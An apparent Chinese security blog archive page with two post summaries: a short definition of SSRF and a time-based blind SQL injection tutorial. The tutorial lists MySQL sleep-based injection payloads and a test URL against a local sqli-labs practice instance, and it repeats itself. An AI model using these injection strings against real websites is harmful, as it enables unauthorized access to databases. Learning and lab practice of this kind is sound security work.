04 2018 档案
摘要:SSRF漏洞是如何产生的?
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)
阅读全文
摘要:
mysql注释 -- ,-- -,#,--+等
常用的判断语句:
' and if(1=0,1, sleep(10)) #
" and if(1=0,1, sleep(10)) --+
) and if(1=0,1, sleep(10)) --+
') and if(1=0,1, sleep(10)) --+
") and if(1=0,1, sleep(10)) --+
下面开始实验
这里我是知道数据库长度的,所以用的是等于=,实战中可以用大小于二分法来进行一个判断,缩短时间(或者丢sqlmap里)
1,输入检测语句
http://192.168.0.174/Less-9/?id=1'and if(1=0,1, sleep(4)) --+
sleep(4)是延迟4秒 --+是注释
按F12 -网络-右下角显示4秒后显示
阅读全文
mysql注释 -- ,-- -,#,--+等
常用的判断语句:
' and if(1=0,1, sleep(10)) #
" and if(1=0,1, sleep(10)) --+
) and if(1=0,1, sleep(10)) --+
') and if(1=0,1, sleep(10)) --+
") and if(1=0,1, sleep(10)) --+
下面开始实验
这里我是知道数据库长度的,所以用的是等于=,实战中可以用大小于二分法来进行一个判断,缩短时间(或者丢sqlmap里)
1,输入检测语句
http://192.168.0.174/Less-9/?id=1'and if(1=0,1, sleep(4)) --+
sleep(4)是延迟4秒 --+是注释
按F12 -网络-右下角显示4秒后显示
阅读全文


浙公网安备 33010602011771号